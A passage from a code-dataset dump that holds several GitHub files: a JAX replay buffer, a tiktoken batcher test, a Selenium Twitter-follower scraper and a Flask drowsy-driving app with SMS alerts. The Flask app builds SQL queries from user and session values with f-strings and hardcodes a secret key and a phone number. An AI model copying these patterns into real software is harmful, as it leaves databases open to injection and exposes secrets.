numpy as np\n\nimport copy\n\nfrom jaxrl2.data.dataset import Dataset, DatasetDict\nimport collections\nfrom flax.core import frozen_dict\n\ndef _init_replay_dict(obs_space: gym.Space,\n capacity: int) -> Union[np.ndarray, DatasetDict]:\n if isinstance(obs_space, gym.spaces.Box):\n return np.empty((capacity, *obs_space.shape), dtype=obs_space.dtype)\n elif isinstance(obs_space, gym.spaces.Dict):\n data_dict = {}\n for k, v in obs_space.spaces.items():\n data_dict[k] = _init_replay_dict(v, capacity)\n return data_dict\n else:\n raise TypeError()\n\n\n\nclass NaiveReplayBuffer(Dataset):\n \n def __init__(self, observation_space: gym.Space, action_space: gym.Space, capacity: int):\n self.observation_space = observation_space\n self.action_space = action_space\n self.capacity = capacity\n\n observations = _init_replay_dict(self.observation_space, self.capacity)\n next_observations = _init_replay_dict(self.observation_space, self.capacity)\n actions = np.empty((self.capacity, *self.action_space.shape), dtype=self.action_space.dtype)\n next_actions = np.empty((self.capacity, *self.action_space.shape), dtype=self.action_space.dtype)\n rewards = np.empty((self.capacity, ), dtype=np.float32)\n mc_return = np.empty((self.capacity, ), dtype=np.float32)\n masks = np.empty((self.capacity, ), dtype=np.float32)\n trajectory_id = np.empty((self.capacity,), dtype=np.float32)\n dones = np.empty((self.capacity,), dtype=np.float32)\n\n self.data = {\n 'observations': observations,\n 'next_observations': next_observations,\n 'actions': actions,\n 'next_actions': next_actions,\n 'rewards': rewards,\n 'masks': masks,\n 'trajectory_id': trajectory_id,\n 'dones': dones,\n }\n\n self.size = 0\n self._traj_counter = 0\n self._start = 0\n self.traj_bounds = dict()\n\n def 
increment_traj_counter(self):\n        self.traj_bounds[self._traj_counter] = (self._start, self.size) # [start, end)\n        self._start = self.size\n        self._traj_counter += 1\n\n    def get_random_trajs(self, num_trajs: int):\n        self.which_trajs = np.random.randint(0, self._traj_counter-1, num_trajs)\n        observations_list = []\n        next_observations_list = []\n        mc_rewards_list = []\n        actions_list = []\n        rewards_list = []\n        terminals_list = []\n        masks_list = []\n\n        for i in self.which_trajs:\n            start, end = self.traj_bounds[i]\n            \n            # handle this as a dictionary\n            obs_dict_curr_traj = dict()\n            for k in self.data['observations']:\n                obs_dict_curr_traj[k] = self.data['observations'][k][start:end]\n            observations_list.append(obs_dict_curr_traj)\n            \n            next_obs_dict_curr_traj = dict()\n            for k in self.data['next_observations']:\n                next_obs_dict_curr_traj[k] = self.data['next_observations'][k][start:end] \n            next_observations_list.append(next_obs_dict_curr_traj)\n            \n            actions_list.append(self.data['actions'][start:end])\n            rewards_list.append(self.data['rewards'][start:end])\n            terminals_list.append(1-self.data['masks'][start:end])\n            masks_list.append(self.data['masks'][start:end])\n        \n        batch = {\n            'observations': observations_list,\n            'next_observations': next_observations_list,\n            'actions': actions_list,\n            'rewards': rewards_list,\n            'terminals': terminals_list,\n            'masks': masks_list\n        }\n        return batch\n    \n    def insert(self, data_dict: DatasetDict):\n        if self.size == self.capacity:\n            # Double the capacity\n            observations = _init_replay_dict(self.observation_space, self.capacity)\n            next_observations = _init_replay_dict(self.observation_space, self.capacity)\n            actions = np.empty((self.capacity, *self.action_space.shape), dtype=self.action_space.dtype)\n            next_actions = np.empty((self.capacity, *self.action_space.shape), dtype=self.action_space.dtype)\n            rewards = np.empty((self.capacity, ), dtype=np.float32)\n            masks = np.empty((self.capacity, ), dtype=np.float32)\n\n            data_new = {\n                'observations': observations,\n                'next_observations': next_observations,\n                'actions': actions,\n                'next_actions': next_actions,\n                'rewards': rewards,\n                'masks': masks,\n            }\n\n            for x in self.data:\n                if isinstance(self.data[x], np.ndarray):\n                    self.data[x] = np.concatenate((self.data[x], data_new[x]), axis=0)\n                elif isinstance(self.data[x], dict):\n                    for y in self.data[x]:\n                        self.data[x][y] = np.concatenate((self.data[x][y], data_new[x][y]), axis=0)\n                else:\n                    raise TypeError()\n            self.capacity *= 2\n\n\n        for x in data_dict:\n            if x in self.data:\n                if isinstance(data_dict[x], dict):\n                    for y in data_dict[x]:\n                        self.data[x][y][self.size] = data_dict[x][y]\n                else: \n                    self.data[x][self.size] = data_dict[x]\n        self.size += 1\n    \n    def compute_action_stats(self):\n        actions = self.data['actions']\n        return {'mean': actions.mean(axis=0), 'std': actions.std(axis=0)}\n\n    def normalize_actions(self, action_stats):\n        # do not normalize gripper dimension (last dimension)\n        action_stats = copy.deepcopy(action_stats)\n        action_stats['mean'][-1] = 0\n        action_stats['std'][-1] = 1\n        self.data['actions'] = (self.data['actions'] - action_stats['mean']) / action_stats['std']\n        self.data['next_actions'] = (self.data['next_actions'] - action_stats['mean']) / action_stats['std']\n\n    def sample(self, batch_size: int, keys: Optional[Iterable[str]] = None, indx: Optional[np.ndarray] = None) -> frozen_dict.FrozenDict:\n        indices = np.random.randint(0, self.size, batch_size)\n        data_dict = {}\n        for x in self.data:\n            if isinstance(self.data[x], np.ndarray):\n                data_dict[x] = self.data[x][indices]\n            elif 
isinstance(self.data[x], dict):\n data_dict[x] = {}\n for y in self.data[x]:\n data_dict[x][y] = self.data[x][y][indices]\n else:\n raise TypeError()\n \n return frozen_dict.freeze(data_dict)\n\n def get_iterator(self, batch_size: int, keys: Optional[Iterable[str]] = None, indx: Optional[np.ndarray] = None, queue_size: int = 2):\n # See https://flax.readthedocs.io/en/latest/_modules/flax/jax_utils.html#prefetch_to_device\n # queue_size = 2 should be ok for one GPU.\n\n queue = collections.deque()\n\n def enqueue(n):\n for _ in range(n):\n data = self.sample(batch_size, keys, indx)\n queue.append(jax.device_put(data))\n\n enqueue(queue_size)\n while queue:\n yield queue.popleft()\n enqueue(1)\n\n\n \nclass NaiveReplayBufferParallel(NaiveReplayBuffer):\n \"\"\"\n Implements naive buffer with parallelism\n \"\"\"\n def __init__(self, observation_space: gym.Space, action_space: gym.Space,\n capacity: int, num_devices=len(jax.devices())):\n self.num_devices = num_devices\n super().__init__(observation_space=observation_space,\n action_space=action_space,\n capacity=capacity)\n \n def get_iterator(self,\n batch_size: int,\n keys: Optional[Iterable[str]] = None,\n indx: Optional[np.ndarray] = None,\n queue_size: int = 2):\n # See https://flax.readthedocs.io/en/latest/_modules/flax/jax_utils.html#prefetch_to_device\n # queue_size = 2 should be ok for one GPU.\n\n queue = collections.deque()\n\n def enqueue(n):\n assert batch_size % self.num_devices == 0\n effective_batch_size = batch_size // self.num_devices\n for _ in range(n):\n data = [self.sample(effective_batch_size, keys, indx) for _ in range(self.num_devices)] \n queue.append(jax.device_put_sharded(data, jax.devices()))\n\n enqueue(queue_size)\n while queue:\n yield queue.popleft()\n enqueue(1)\n", "repo_name": "Asap7772/PTR", "sub_path": "jaxrl2/data/naive_replay_buffer.py", "file_name": "naive_replay_buffer.py", "file_ext": "py", "file_size_in_byte": 8825, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gym.Space", "line_number": 16, "usage_type": "attribute"}, {"api_name": "gym.spaces", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 19, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 20, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 17, "usage_type": "attribute"}, {"api_name": "jaxrl2.data.dataset.DatasetDict", "line_number": 17, "usage_type": "name"}, {"api_name": "jaxrl2.data.dataset.Dataset", "line_number": 30, "usage_type": "name"}, {"api_name": "gym.Space", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 45, "usage_type": "call"}, 
{"api_name": "numpy.float32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 69, "usage_type": "attribute"}, {"api_name": "jaxrl2.data.dataset.DatasetDict", "line_number": 107, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 131, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 152, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 158, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 158, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 162, "usage_type": "attribute"}, {"api_name": "flax.core.frozen_dict.freeze", "line_number": 171, "usage_type": "call"}, {"api_name": "flax.core.frozen_dict", "line_number": 171, "usage_type": "name"}, {"api_name": "flax.core.frozen_dict.FrozenDict", "line_number": 158, "usage_type": "attribute"}, {"api_name": "flax.core.frozen_dict", "line_number": 158, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 173, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 173, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 173, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 177, "usage_type": "call"}, {"api_name": "jax.device_put", "line_number": 182, "usage_type": "call"}, {"api_name": "gym.Space", "line_number": 195, "usage_type": "attribute"}, {"api_name": "jax.devices", "line_number": 196, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 204, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 204, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 205, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 205, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 210, "usage_type": "call"}, {"api_name": "jax.device_put_sharded", "line_number": 217, "usage_type": "call"}, {"api_name": "jax.devices", "line_number": 217, "usage_type": "call"}]} +{"seq_id": "42832223085", "text": "from copy import copy\nfrom pathlib import Path\nfrom tempfile import NamedTemporaryFile\n\nimport pytest\nimport tiktoken\nfrom tiktoken import Encoding\n\nfrom nxontology_ml.gpt_tagger import TaskConfig\nfrom nxontology_ml.gpt_tagger._openai_models import _4K\nfrom nxontology_ml.gpt_tagger._tiktoken_batcher import _TiktokenBatcher\nfrom nxontology_ml.tests.utils import get_test_resource_path\n\n\n@pytest.fixture\ndef tiktoken_cl100k_encoding() -> Encoding:\n return tiktoken.get_encoding(\"cl100k_base\")\n\n\ndef test_add_tokens(tiktoken_cl100k_encoding: Encoding) -> None:\n 
record = \"record\"\n record_len = len(tiktoken_cl100k_encoding.encode(record))\n\n batcher = _TiktokenBatcher(\n max_token_cnt=2 * record_len, tiktoken_encoding=tiktoken_cl100k_encoding\n )\n assert batcher._record_buffer == []\n assert batcher._buffer_token_cnt == 0\n\n ret = batcher.add_record_to_buffer(record)\n assert ret is None\n assert batcher._record_buffer == [record]\n assert batcher._buffer_token_cnt == record_len\n\n ret = batcher.add_record_to_buffer(record)\n assert ret is None\n assert batcher._record_buffer == [record, record]\n assert batcher._buffer_token_cnt == 2 * record_len\n\n ret = batcher.add_record_to_buffer(record)\n assert ret == [record, record]\n assert batcher._record_buffer == [record]\n assert batcher._buffer_token_cnt == record_len\n\n ret = batcher.flush_buffer()\n assert ret == [record]\n assert batcher._record_buffer == []\n assert batcher._buffer_token_cnt == 0\n\n # Error triggered by internal tempering\n batcher._do_add_record_to_buffer(record)\n batcher._do_add_record_to_buffer(record)\n with pytest.raises(ValueError, match=\"Buffer size exceeded\"):\n batcher._do_add_record_to_buffer(record)\n\n\ndef test_from_config(\n tiktoken_cl100k_encoding: Encoding, precision_config: TaskConfig\n) -> None:\n # Valid config\n batcher = _TiktokenBatcher.from_config(precision_config)\n assert batcher._tiktoken_encoding == tiktoken_cl100k_encoding\n\n prompt = get_test_resource_path(\"precision_v1.txt\")\n prompt_tokens = len(tiktoken_cl100k_encoding.encode(prompt.read_text()))\n assert prompt_tokens > 0\n assert (\n batcher._max_token_cnt\n == int(_4K * precision_config.prompt_token_ratio) - prompt_tokens\n )\n\n # Prompt too long\n invalid_test_config = copy(precision_config)\n with NamedTemporaryFile() as tmpfile:\n # Mk faulty prompt content\n prompt_path = Path(tmpfile.name)\n # Uncommon symbol has >= 1 token per char\n prompt_content = \"Ⓡ\" * (_4K + 1)\n assert len(tiktoken_cl100k_encoding.encode(prompt_content)) >= _4K + 1\n prompt_path.write_text(prompt_content)\n\n invalid_test_config.prompt_path = prompt_path\n with pytest.raises(\n ValueError,\n match=\"The provided prompt has more tokens than the window of the model.\",\n ):\n _TiktokenBatcher.from_config(invalid_test_config)\n", "repo_name": "related-sciences/nxontology-ml", "sub_path": "nxontology_ml/gpt_tagger/tests/_tiktoken_batcher_test.py", "file_name": "_tiktoken_batcher_test.py", "file_ext": "py", "file_size_in_byte": 2983, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tiktoken.get_encoding", "line_number": 17, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tiktoken.Encoding", "line_number": 16, "usage_type": "name"}, {"api_name": "tiktoken.Encoding", "line_number": 20, "usage_type": "name"}, {"api_name": "nxontology_ml.gpt_tagger._tiktoken_batcher._TiktokenBatcher", "line_number": 24, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 53, "usage_type": "call"}, {"api_name": "tiktoken.Encoding", "line_number": 58, "usage_type": "name"}, {"api_name": "nxontology_ml.gpt_tagger.TaskConfig", "line_number": 58, "usage_type": "name"}, {"api_name": "nxontology_ml.gpt_tagger._tiktoken_batcher._TiktokenBatcher.from_config", "line_number": 61, "usage_type": "call"}, {"api_name": "nxontology_ml.gpt_tagger._tiktoken_batcher._TiktokenBatcher", "line_number": 61, "usage_type": "name"}, {"api_name": 
"nxontology_ml.tests.utils.get_test_resource_path", "line_number": 64, "usage_type": "call"}, {"api_name": "nxontology_ml.gpt_tagger._openai_models._4K", "line_number": 69, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 73, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 74, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 76, "usage_type": "call"}, {"api_name": "nxontology_ml.gpt_tagger._openai_models._4K", "line_number": 78, "usage_type": "name"}, {"api_name": "nxontology_ml.gpt_tagger._openai_models._4K", "line_number": 79, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 83, "usage_type": "call"}, {"api_name": "nxontology_ml.gpt_tagger._tiktoken_batcher._TiktokenBatcher.from_config", "line_number": 87, "usage_type": "call"}, {"api_name": "nxontology_ml.gpt_tagger._tiktoken_batcher._TiktokenBatcher", "line_number": 87, "usage_type": "name"}]} +{"seq_id": "72388901924", "text": "from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import SessionNotCreatedException\nimport selenium\nimport time\n\noptions = Options()\noptions.add_argument(f\"--user-data-dir=C:/Users/<username>/AppData/Local/Google/Chrome/User Data/profiledata\")\noptions.add_argument(f\"--profile-directory=Profile 2\")\nservice = Service(ChromeDriverManager().install())\ndriver = webdriver.Chrome(service=service, options=options)\n\ndef get_followers(screen_name):\n \"\"\"\n get_followers(screen_name)\n return follower_list\n Failed -> False\n \"\"\"\n try:\n driver.get(f\"https://twitter.com/{screen_name}/followers\")\n driver.implicitly_wait(1)\n follower_list = []\n # Code to goto End of the Page\n last_height = driver.execute_script(\"return document.body.scrollHeight\")\n while True:\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(1)\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n\n usernames = driver.find_elements(By.CLASS_NAME,value=\"css-4rbku5.css-18t94o4.css-1dbjc4n.r-1loqt21.r-1wbh5a2.r-dnmrzs.r-1ny4l3l\")\n for list in usernames:\n follower_list.append(list.get_attribute(\"href\"))\n return follower_list\n except Exception:\n return False", "repo_name": "yuu996/twinium", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 1706, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 14, "usage_type": "call"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 14, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 15, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 37, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 37, "usage_type": "name"}]} +{"seq_id": 
"27478854407", "text": "from flask import Flask, request, render_template, url_for, redirect, session\nimport yaml\nimport psycopg2\nfrom auth import start_verify, check_verify\nfrom PIL import Image\nimport base64\nimport io\nfrom flask import Response as FlaskResponse\nfrom flask import jsonify\nimport json\nfrom dump_table import dump_rows as dr\nimport numpy as np\nimport cv2\nfrom tensorflow import keras\nfrom send_msg import send_message\nfrom decimal import *\n\n\ncreds = yaml.safe_load(open(\"creds.yaml\", \"r\"))\n\napp = Flask(__name__)\n\napp.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT' #needed to use sessions\n\n\nconn = psycopg2.connect(creds[\"DATABASE_URL\"])\n\n\n@app.route('/')\ndef test():\n return render_template('index.html')\n\n@app.route('/sign_in', methods=['GET', 'POST'])\ndef sign_in():\n print('got a request')\n if request.method == 'GET':\n x = 1\n else:\n # Do stuff here\n print('in here')\n\n # try:\n # ret = request.get_json()\n # except:\n # print('could not get json')\n # return render_template('index.html')\n # print('got here')\n # if ret == None:\n # return render_template('index.html')\n\n # number = ret['number']\n\n number = request.values.get('phone')\n print(f'request: {request}')\n print(f'request form: {request.form}')\n print(f'request.values: {request.values}')\n print(number)\n\n if not verify_phone(number):\n print('could not verify number')\n return False\n\n # session['number'] = number\n # print(f'set the session number, {session[\"number\"]}')\n status = start_verify(number)\n print(f'status: {status}')\n\n #for a test try to insert number into sql table\n return True\n\n\n # Check to see if the number is in the data base\n # docs = users.where(u'number', u'==', '5').stream()\n # print(number)\n\n # size = 0\n # for doc in docs:\n # if size > 0:\n # print('something is wrong')\n # else:\n # size += 1\n # # maybe unpack some things about the user\n\n\n # need to verify number either way\ndef getOldTime(number):\n with conn.cursor() as c:\n #get the old amount of time driven\n table_name = 'LEADERBOARD'\n c.execute(f'SELECT time FROM {table_name} WHERE number=\\'{number}\\';')\n time = c.fetchall()\n # print(user)\n conn.commit()\n oldTime = float(time[0][0])\n return oldTime\n\ndef updateLeaderboard(hoursDriven, oldTime, number):\n # number = str(session['number'])\n updatedHours = hoursDriven + oldTime\n with conn.cursor() as c:\n table_name = 'LEADERBOARD'\n c.execute(f'UPDATE {table_name} SET time = \\'{updatedHours}\\'WHERE number=\\'{number}\\';')\n c.execute(f'UPDATE {table_name} SET numdrives = numdrives + 1 WHERE number=\\'{number}\\';')\n # c.execute(f'UPDATE {table_name} SET numdrives = \\'{updatedHours}\\'WHERE number=\\'{number}\\';')\n # time = c.fetchall()\n # print(user)\n conn.commit()\n with conn.cursor() as c:\n table_name = 'LEADERBOARD'\n #THIS DOESNT WORK BECAUSE TIME IS A VARCHAR AND NOT AN INT/DOUBLE\n c.execute(f'SELECT COUNT(name) FROM {table_name} WHERE number!=\\'{number}\\' AND time > \\'{updatedHours}\\';')\n result = c.fetchall()\n # print(user)\n conn.commit()\n print(result)\n above = result[0][0]\n hoursDriven /= 60000\n toSend = f'You added {hoursDriven} seconds of safe driving. There are now {above} people ahead of you on the leaderboard! 
Keep it up!'\n send_message(toSend, number)\n\ndef send_warning(num):\n print('sending warning for')\n with conn.cursor() as c:\n table_name = 'USERS'\n num = num.strip()\n sql = f'''SELECT name, econ1 FROM {table_name} WHERE number='{num}';'''\n print(sql)\n c.execute(sql)\n # c.execute(f'UPDATE {table_name} SET numdrives = numdrives + 1 WHERE number=\\'{number}\\';')\n # c.execute(f'UPDATE {table_name} SET numdrives = \\'{updatedHours}\\'WHERE number=\\'{number}\\';')\n res = c.fetchall()\n print(res)\n # print(user)\n conn.commit()\n name = res[0][0]\n econ1 = res[0][1]\n print(f'name: {name}, econ1: {econ1}')\n econ1='4845385080'\n\n to_send = f'We have detected that {name} is potentially driving drowsy, you may want to contact them to make sure that they are not making bad decisions'\n send_message(to_send, econ1)\n \n\n@app.route('/end_drive', methods = [\"POST\"])\ndef end():\n number = str(session['number'])\n print('ending the drive')\n # number = \"7817388373\"\n hoursDriven = request.json['hoursDriven']\n print(f'ending drive for: {number}, with hoursDriven: {hoursDriven}')\n # badTime = request.json['hoursDriven']\n oldTime = getOldTime(number)\n #update leaderboard\n updateLeaderboard(hoursDriven, oldTime, number)\n\n@app.route('/landing', methods = [\"GET\"])\ndef landing():\n table_name = 'USERS'\n number = str(session['number'])\n with conn.cursor() as c:\n c.execute(f'SELECT * FROM {table_name} WHERE number=\\'{number}\\';')\n user = c.fetchall()\n # print(user)\n conn.commit()\n name = user[0][1]\n return render_template('landing.html',name=name)\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if request.method == 'GET':\n print(f'here, {session[\"number\"]}')\n return render_template('register.html')\n else:\n # print(f'getting request: {request}')\n # print(f'request form: {request.form}')\n print(\"Request Received!\")\n print(\"Username: \" + request.form['name'])\n print(\"School: \"+ request.form['school'])\n print(\"Emergency Contact1: \" + request.form['contact1'])\n uname = request.form['name']\n school = request.form['school']\n econ1 = request.form['contact1']\n number = session['number']\n with conn.cursor() as cur:\n # number='9788065553'\n # sql = f'''SELECT * FROM USERS WHERE number = '5';'''\n query = 'INSERT INTO Users (number, name, school, econ1) VALUES (\\'{}\\', \\'{}\\', \\'{}\\', \\'{}\\');'.format(number, uname, school, econ1)\n cur.execute(query)\n conn.commit()\n return None\n\ndetector = cv2.FaceDetectorYN.create(\n 'face_detection_yunet_2022mar.onnx',\n \"\",\n (640, 480),\n 0.9, # score threshold\n 0.3, # nms threshold\n 5000 # top k\n)\neyesModel = keras.models.load_model('eyesOpenClose.h5')\nyawnModel = keras.models.load_model('yawn.h5')\n@app.route('/live', methods=['POST'])\ndef live():\n #take in the image and compare it to the model\n \n print(f'request: {request}')\n # print(f'request form: {request.form}')\n # print(f'request.values: {request.values}')\n # print(f'request json: {request.get_json()}' )\n # print(f'{request.json[\"imageSrc\"]}')\n # with open('test.json', 'w') as f:\n # f.write(request.json['imageSrc'])\n\n # ret = json.load(request.json)\n # print(f'ret: {ret}')\n # print(f'{type(request.json[\"imageSrc\"])}')\n b = (request.json['imageSrc'])\n z = b[b.find('/9'):]\n nparr = np.fromstring(base64.b64decode(z), np.uint8)\n frame = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n frame = cv2.flip(frame, 1) # if your camera reverses your image\n faces = detector.detect(frame)[1]\n \n if faces is not None:\n 
face_boxes = []\n        for face in faces:\n            x,y,w,h = face[:4].astype('int')\n            face_boxes.append([x,y,x+w,y+h])\n        \n        lx,ly,la,lb = sorted([[x,y,a,b,(a-x)*(b-y)] for x,y,a,b in face_boxes], key=lambda x: x[4])[-1][:-1]\n        face_array = frame[max(0,ly):min(lb,frame.shape[0]), max(0,lx):min(la,frame.shape[1])]\n        face_array = cv2.resize(face_array, (100,100)).reshape(-1, 100, 100, 3)\n\n        yawn_pred = yawnModel.predict(face_array/255, verbose=0).item()\n        yawn_text = \"Mouth: Open\" if yawn_pred < 0.2 else \"Mouth: Closed\"\n        cv2.putText(frame, yawn_text, (frame.shape[1]-250,frame.shape[0]-50), cv2.FONT_HERSHEY_SIMPLEX, 1, (50, 203, 241), 2)\n\n        eyes_pred = eyesModel.predict(face_array/255, verbose=0).item()\n        eyes_text = \"Eyes: Closed\" if eyes_pred < 0.50 else \"Eyes: Open\"\n        cv2.putText(frame, eyes_text, (25,frame.shape[0]-50), cv2.FONT_HERSHEY_SIMPLEX, 1, (50, 203, 241), 2)\n\n        frame = cv2.rectangle(frame, (lx, ly), (la, lb), (0, 255, 0), 2)\n        \n\n    retval, buffer = cv2.imencode('.jpg', frame)\n\n    # z = base64.b64encode(frame.tobytes())\n    # b = \"data:image/jpeg;base64,/9j/\" + z.decode(\"utf-8\") \n    b = base64.b64encode(buffer)\n    b = \"data:image/jpeg;base64,\" + b.decode(\"utf-8\") \n\n    asleep = False\n    print(f'yawn_pred: {yawn_pred}, eyes_pred: {eyes_pred}')\n    if yawn_pred < 0.2 and eyes_pred < 0.5:\n        print('asleep')\n        asleep = True\n        number = session['number']\n        # number='9788065553'\n        print(f'number: {number}')\n        print('going to send warning')\n        send_warning(number)\n\n\n    response = {\n        'asleep': asleep,\n        'image': b,\n    }\n    response = json.dumps(response)\n    return response\n\n@app.route('/verify', methods=['GET', 'Post'])\ndef verify():\n    '''\n    takes in the number and the code and either takes them into the logged\n    in page if they already have an account or brings them to the create an account\n    page\n    '''\n    if request.method == 'GET':\n        x = 1\n        # return render_template('verify.html', new=True, pnum=6)\n\n\n    print(request.values)\n\n    # new = request.values.get('new')\n    number = request.values.get('pnum')[2:]\n    session['number'] = number\n    print('the number is')\n    print(number)\n    # number = '9788065553'\n    print(f'number: {number}')\n    code = request.values.get('code')\n    print(f'code: {code}')\n\n    status = check_verify(number, code)\n\n\n    print(f'status: {status}')\n    print(f'type: {type(status)}')\n\n    if status == 'approved':\n        print(f'the number was approved, checking to see if they already exist')\n        #check to see if the phone number is already associated with a user account\n        with conn.cursor() as cur:\n            # number='9788065553'\n            # sql = f'''SELECT * FROM USERS WHERE number = '5';'''\n            sql = f'''SELECT * FROM USERS WHERE number='{number}';'''\n            cur.execute(sql)\n            res = cur.fetchall()\n            conn.commit()\n        print(res)\n        if res == []:\n            #no user exists, send them to create account page \n            print(f'the user does not exist')\n            print('rendering register')\n            # session['number'] = number #store number as session variable\n            # return render_template('register.html')\n            return redirect(url_for('register'))\n        else:\n            print(f'The user exists, res: {res}')\n            #there is a user so send them to logged in page\n            return redirect(url_for('landing')) \n    elif status == 'pending':\n        #not approved\n        print(status)\n        print('not approved')\n        return render_template('index.html')\n    else:\n        print('.') \n\n@app.route('/leaderboard', methods=['GET'])\ndef leaderboard():\n    with conn.cursor() as c:\n        c.execute(f'SELECT * FROM LEADERBOARD ORDER BY time DESC LIMIT 5;')\n        users = c.fetchall()\n        conn.commit()\n    top5 = 
{1:{},2:{},3:{},4:{},5:{}}\n i = 1\n for user in users:\n try:\n top5[i] = {'name':user[1],'drives':user[2],'time':user[3]}\n except:\n top5[i] = {'name':'','drives':'','time':''}\n i+=1\n \n one = top5[1]\n two = top5[2]\n three = top5[3]\n four = top5[4]\n five = top5[5]\n return render_template('leaderboard.html',one=one,two=two,three=three,four=four,five=five)\n\n\n # print('is a new user')\n # print(new)\n\n # temp_ret = temp_codes.document(number).get().to_dict()\n # actual_num = temp_ret['number']\n\n # if str(actual_num) == str(code):\n # print('it worked')\n # if new == 'True':\n # # return form\n # return render_template('survey.html', pnum=number)\n # else:\n # print('is not a new user')\n # # return whatever page we show people who already \n # # return render_template('results.html') #will need to give it more 0\n # return get_group(number)\n\n # else:\n # print('actual code')\n # print(actual_num)\n # print('inputed code')\n # print(code)\n # print('wrong code')\n # return render_template('verify.html', new=new, pnum=number)\n\n\ndef verify_phone(num):\n print('calling the verify method')\n num = num[2:]\n import re\n regex = re.compile(r'^(\\+\\d{1,2}\\s?)?1?\\-?\\.?\\s?\\(?\\d{3}\\)?[\\s.-]?\\d{3}[\\s.-]?\\d{4}$')\n return regex.search(str(num))", "repo_name": "PatKuz/BostonHacks22", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 13050, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "yaml.safe_load", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 21, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 53, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 